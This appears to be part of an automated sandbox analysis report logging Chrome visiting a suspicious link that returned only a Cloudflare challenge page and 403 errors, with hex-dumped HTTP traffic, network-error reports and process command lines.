                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:09:28 UTC751INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 78 4b 65 73 71 4b 68 38 67 47 46 47 7a 6b 46 4a 56 2b 47 31 31 62 7a 2f 36 6c 46 38 7a 32 4a 73 79 54 5a 50 51 70 59 2f 73 72 63 68 55 6a 59 6e 4f 71 6b 2b 4a 43 48 43 36 62 36 5a 76 76 56 47 36 43 7a 4f 64 5a 62 33 6d 58 50 39 68 62 37 6d 4f 6c 47 69 71 74 4c 49 47 34 79 64 30 6b 73 78 6f 4b 41 59 6a 37 69 46 54 7a 4b 62 50 4d 77 4c 31 44 2b 68 73 30 43 62 61 43 74 56 72 4d 62 4b 32 58 70 33 51 6e 6c 34 5a 70 56 70 48 79 69 33 66 61 2f 45 4c 51 3d 3d 24 74 38 6b 70 54 47 49 55 4c 6c 69 69 5a 79 59 64 58 65 4c 71 49 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: xKesqKh8gGFGzkFJV+G11bz/6lF8z2JsyTZPQpY/srchUjYnOqk+JCHC6b6ZvvVG6CzOdZb3mXP9hb7mOlGiqtLIG4yd0ksxoKAYj7iFTzKbPMwL1D+hs0CbaCtVrMbK2Xp3Qnl4ZpVpHyi3fa/ELQ==$t8kpTGIULliiZyYdXeLqIQ==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                    2024-05-22 15:09:28 UTC707INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:09:28 UTC1369INData Raw: 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d
                                    Data Ascii: ody a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:im
                                    2024-05-22 15:09:28 UTC1369INData Raw: 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c
                                    Data Ascii: 00vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-col
                                    2024-05-22 15:09:28 UTC1369INData Raw: 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b
                                    Data Ascii: y45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;
                                    2024-05-22 15:09:28 UTC1369INData Raw: 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65
                                    Data Ascii: 1aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transpare
                                    2024-05-22 15:09:28 UTC1369INData Raw: 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a
                                    Data Ascii: zLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLj
                                    2024-05-22 15:09:28 UTC1369INData Raw: 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e
                                    Data Ascii: :#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.
                                    2024-05-22 15:09:28 UTC1369INData Raw: 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65
                                    Data Ascii: nd (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challe
                                    2024-05-22 15:09:28 UTC1369INData Raw: 34 62 31 6e 62 63 7a 79 57 5a 45 51 72 64 63 35 70 65 38 4f 67 48 43 4f 31 42 51 4d 6b 6a 4e 77 75 59 43 56 76 5f 37 50 61 6b 48 34 42 44 4f 4b 59 36 39 73 31 51 39 4b 79 70 69 78 53 42 4f 69 38 46 4e 69 51 32 48 67 35 4f 58 55 66 73 62 58 6b 48 67 4c 2e 35 64 33 44 66 34 6e 50 55 5a 4e 2e 48 52 6d 74 79 65 4a 73 7a 67 57 52 37 7a 43 50 63 50 4a 6f 4b 4c 75 6b 69 69 35 49 6b 37 59 6b 36 4a 75 49 73 67 4f 34 41 67 6e 4a 67 6d 50 55 53 45 78 49 48 44 47 41 4a 53 4a 67 71 62 66 5a 71 68 67 49 4e 77 66 4d 38 57 64 70 6d 41 55 71 5f 4c 63 4d 4f 6e 67 38 2e 73 71 72 55 59 69 36 42 4f 45 62 46 70 56 2e 2e 6a 33 45 5a 37 65 67 54 56 58 30 75 38 44 63 42 53 47 4a 69 67 66 6f 36 6e 53 43 56 59 52 62 6e 34 48 67 61 63 4d 56 38 44 33 33 7a 76 6c 73 58 74 6b 41 31 64
                                    Data Ascii: 4b1nbczyWZEQrdc5pe8OgHCO1BQMkjNwuYCVv_7PakH4BDOKY69s1Q9KypixSBOi8FNiQ2Hg5OXUfsbXkHgL.5d3Df4nPUZN.HRmtyeJszgWR7zCPcPJoKLukii5Ik7Yk6JuIsgO4AgnJgmPUSExIHDGAJSJgqbfZqhgINwfM8WdpmAUq_LcMOng8.sqrUYi6BOEbFpV..j3EZ7egTVX0u8DcBSGJigfo6nSCVYRbn4HgacMV8D33zvlsXtkA1d


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    47192.168.2.44982035.190.80.14433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:57 UTC569OUTOPTIONS /report/v4?s=CrtbplJ7Ts50Ffwf6vozefv3cO5hcbSp1dY35h%2B1vnVp8C%2BTOBbW0Hu3WR10kmnw3cxMfskrN3XrfVP91I%2FAsF97vlawby2SsmBs8QbOgeKWURONYgE%2BZDfEhjfU5xxw4ZAg0%2FV9VVJipSh0rg%3D%3D HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Origin: https://gth.miconlinestickbu.store
                                    Access-Control-Request-Method: POST
                                    Access-Control-Request-Headers: content-type
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:58 UTC336INHTTP/1.1 200 OK
                                    content-length: 0
                                    access-control-max-age: 86400
                                    access-control-allow-methods: POST, OPTIONS
                                    access-control-allow-origin: *
                                    access-control-allow-headers: content-type, content-length
                                    date: Wed, 22 May 2024 15:09:57 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    48192.168.2.44982135.190.80.14433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:57 UTC561OUTOPTIONS /report/v4?s=0IwYs16BqjdC9UTsglWvKBt1Ntc568lsx9VkFcXyxBxndNRCRQhgf9nhelPmj764DdU0LaKE2Vk0WDve7hL6KRFFs9X9xEmplyk1PBZNDyDoxKbI5hNUkpBA%2BhKbk2LZQH9kJA6jtQtpNY1gyg%3D%3D HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Origin: https://gth.miconlinestickbu.store
                                    Access-Control-Request-Method: POST
                                    Access-Control-Request-Headers: content-type
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:58 UTC336INHTTP/1.1 200 OK
                                    content-length: 0
                                    access-control-max-age: 86400
                                    access-control-allow-methods: OPTIONS, POST
                                    access-control-allow-origin: *
                                    access-control-allow-headers: content-type, content-length
                                    date: Wed, 22 May 2024 15:09:58 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    49192.168.2.44982235.190.80.14433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:58 UTC501OUTPOST /report/v4?s=CrtbplJ7Ts50Ffwf6vozefv3cO5hcbSp1dY35h%2B1vnVp8C%2BTOBbW0Hu3WR10kmnw3cxMfskrN3XrfVP91I%2FAsF97vlawby2SsmBs8QbOgeKWURONYgE%2BZDfEhjfU5xxw4ZAg0%2FV9VVJipSh0rg%3D%3D HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 2377
                                    Content-Type: application/reports+json
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:58 UTC2377OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 36 36 35 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 37 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 74 68 2e 6d 69 63 6f 6e 6c 69 6e 65 73 74 69 63 6b 62 75 2e 73 74 6f 72 65 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 31 2e 34 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d
                                    Data Ascii: [{"age":56654,"body":{"elapsed_time":671,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://gth.miconlinestickbu.store/","sampling_fraction":1.0,"server_ip":"104.21.21.44","status_code":403,"type":"http.error"},"type":"network-
                                    2024-05-22 15:09:58 UTC168INHTTP/1.1 200 OK
                                    content-length: 0
                                    date: Wed, 22 May 2024 15:09:58 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    50192.168.2.44982335.190.80.14433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:58 UTC493OUTPOST /report/v4?s=0IwYs16BqjdC9UTsglWvKBt1Ntc568lsx9VkFcXyxBxndNRCRQhgf9nhelPmj764DdU0LaKE2Vk0WDve7hL6KRFFs9X9xEmplyk1PBZNDyDoxKbI5hNUkpBA%2BhKbk2LZQH9kJA6jtQtpNY1gyg%3D%3D HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 3195
                                    Content-Type: application/reports+json
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:58 UTC3195OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 30 32 34 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 33 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 31 2e 34 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 74 68 2e 6d 69 63 6f 6e 6c 69 6e 65
                                    Data Ascii: [{"age":30245,"body":{"elapsed_time":834,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.21.44","status_code":403,"type":"http.error"},"type":"network-error","url":"https://gth.miconline
                                    2024-05-22 15:09:59 UTC168INHTTP/1.1 200 OK
                                    content-length: 0
                                    date: Wed, 22 May 2024 15:09:58 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Click to jump to process

                                    Click to jump to process

                                    Click to jump to process

                                    Target ID:0
                                    Start time:11:08:30
                                    Start date:22/05/2024
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                    Imagebase:0x7ff76e190000
                                    File size:3'242'272 bytes
                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:2
                                    Start time:11:08:33
                                    Start date:22/05/2024
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2124,i,15610489227219973770,6492909471332572734,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Imagebase:0x7ff76e190000
                                    File size:3'242'272 bytes
                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Target ID:3
                                    Start time:11:08:36
                                    Start date:22/05/2024
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pss"
                                    Imagebase:0x7ff76e190000
                                    File size:3'242'272 bytes
                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    No disassembly